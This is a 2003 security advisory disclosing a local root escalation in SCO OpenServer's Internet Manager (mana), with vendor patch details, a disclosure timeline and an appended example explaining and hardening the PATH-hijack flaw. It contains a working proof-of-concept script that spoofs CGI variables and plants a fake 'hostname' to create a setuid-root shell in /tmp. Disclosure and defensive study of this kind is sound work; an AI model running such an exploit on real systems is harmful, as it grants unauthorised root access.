-----------------------------------------------------------------------
                  Texonet Security Advisory 20030902
-----------------------------------------------------------------------

Advisory ID  : TEXONET-20030902
Authors      : Joel Soderberg and Christer Oberg
Issue date   : Tuesday, September 02, 2003
Publish date : Monday, September 15, 2003
Application  : SCO OpenServer / Internet Manager (mana)
Version(s)   : 5.0.5 - 5.0.7
Platforms    : OpenServer
Availability : http://www.texonet.com/advisories/TEXONET-20030902.txt

-----------------------------------------------------------------------
Problem:
-----------------------------------------------------------------------

A vulnerability in the SCO Internet Manager (mana) program for OpenServer
(SCO Unix) lets local users gain root privileges.

Description:
-----------------------------------------------------------------------

Short description from SCO: "SCO Internet Manager - allowing users to
easily configure and manage Internet and intranet servers."

The SCO Internet Manager (mana) is designed to be run via ncsa_httpd on
port 615, where it is password protected. Running
/usr/internet/admin/mana/mana locally is, however, possible, and mana
decides whether a request is trusted from the CGI environment variables it
inherits. By exporting REMOTE_ADDR=127.0.0.1, mana is tricked into
executing menu.mana as if the request had come through the
password-protected ncsa_httpd area. Another interesting environment
variable is PATH_INFO, which tells mana which .mana file to run.

The file pass-err.mana contains the following lines:

    if {[catch {exec hostname} hostName] != 0} {
        set hostName localhost
    }
    set mana(localHostName) $hostName
    return {}

This tells us that mana executes "hostname" when this file is run, and
that it looks "hostname" up through PATH rather than calling it by an
absolute path. Setting PATH_INFO to /pass-err.mana and PATH to ./:$PATH
therefore makes mana execute ./hostname with root privileges.

Example (Simple POC):

This proof of concept for OpenServer 5.0.7 should give any local user
euid=0(root).
  $ uname -a
  SCO_SV openserv 3.2 5.0.7 i386
  $ id
  uid=200(test) gid=50(group) groups=50(group)
  $ sh mana-root.sh
  # id
  uid=200(test) gid=50(group) euid=0(root) groups=50(group)

- Code Start - mana-root.sh
----------------------------C-U-T---H-E-R-E----------------------------
#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
# Make mana treat the request as local and trusted, and select the
# .mana file that runs "hostname".
REMOTE_ADDR=127.0.0.1
PATH_INFO=/pass-err.mana
# Put the current directory first so "hostname" resolves to our script.
PATH=./:$PATH
export REMOTE_ADDR
export PATH_INFO
export PATH
# Our "hostname": copies sh to /tmp and makes it setuid root.
echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname
chmod 755 hostname
/usr/internet/admin/mana/mana > /dev/null
/tmp/sh
----------------------------C-U-T---H-E-R-E----------------------------
- Code End -

Workaround:
-----------------------------------------------------------------------

The proper solution is to install the latest packages from SCO.

Location of Fixed Binaries

    ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19

Verification

    MD5 (VOL.000.000) = 37b55df2c9000c703a22baafbe9cef42

    md5 is available for download from
    ftp://ftp.sco.com/pub/security/tools

Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

    1) Download the VOL* files to the /tmp directory.
    2) Run the custom command, specify an install from media images, and
       specify the /tmp directory as the location of the images.

Disclosure Timeline:
-----------------------------------------------------------------------

9/02/2003: Vendor notified by e-mail
9/03/2003: Vendor has verified the issue and is working on a solution
9/15/2003: Public release

About Texonet:
-----------------------------------------------------------------------

Texonet is a Swedish security company with a focus on penetration
testing / security assessments, research and development.

Contacting Texonet:
-----------------------------------------------------------------------

E-mail:   advisories(-at-)texonet.com
Homepage: http://www.texonet.com/
Phone:    +46-8-55174611
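The following added example (not SCO's code and not part of the original advisory) models the "exec hostname" from pass-err.mana described above as a shell function, shows how the PATH=./:$PATH trick redirects it to an attacker-supplied "hostname", and places a variant beside it that ignores the inherited PATH. The function names run_hostname_vulnerable, run_hostname_hardened and simulate_hijack are hypothetical, and the fake "hostname" payload is constructed for the demonstration; nothing here needs mana or root.

```shell
#!/bin/sh
# Added example, not SCO's code. Function names are hypothetical.

# Vulnerable pattern: "hostname" is resolved through the caller's PATH,
# exactly as the Tcl "exec hostname" in pass-err.mana does. The
# "localhost" fallback mirrors the catch{} in that file.
run_hostname_vulnerable() {
    hostname 2>/dev/null || echo localhost
}

# Hardened pattern: "command -p" searches the system default PATH
# (the value of "getconf PATH"), so a directory prepended by the caller is
# never consulted. Same "localhost" fallback.
run_hostname_hardened() {
    command -p hostname 2>/dev/null || echo localhost
}

# simulate_hijack MODE: run one variant from a directory holding an
# attacker-supplied "hostname", with PATH=./:$PATH as in the advisory.
# Prints whatever "hostname" produced; MODE is "vulnerable" or "hardened".
simulate_hijack() {
    mode=$1
    dir=$(mktemp -d) || return 1
    # Constructed payload: a fake "hostname" that only reveals that it ran.
    printf '#!/bin/sh\necho PWNED\n' > "$dir/hostname"
    chmod 755 "$dir/hostname"
    (
        cd "$dir" || exit 1
        PATH=./:$PATH
        export PATH
        case $mode in
            vulnerable) run_hostname_vulnerable ;;
            hardened)   run_hostname_hardened ;;
            *)          echo "unknown mode: $mode" >&2; exit 2 ;;
        esac
    )
    status=$?
    rm -rf "$dir"
    return $status
}

# Stand-alone run: the first line reads PWNED, the second never does.
printf 'vulnerable: %s\n' "$(simulate_hijack vulnerable)"
printf 'hardened:   %s\n' "$(simulate_hijack hardened)"
```

The point generalises beyond mana: any privileged program that resolves a helper through an environment it does not control (PATH here, but also IFS, LD_LIBRARY_PATH or a CGI variable such as REMOTE_ADDR used as an authorisation signal) hands that control to whoever can set the environment before exec. Fix it by using an absolute path or a fixed search path and by not deriving trust from caller-supplied variables.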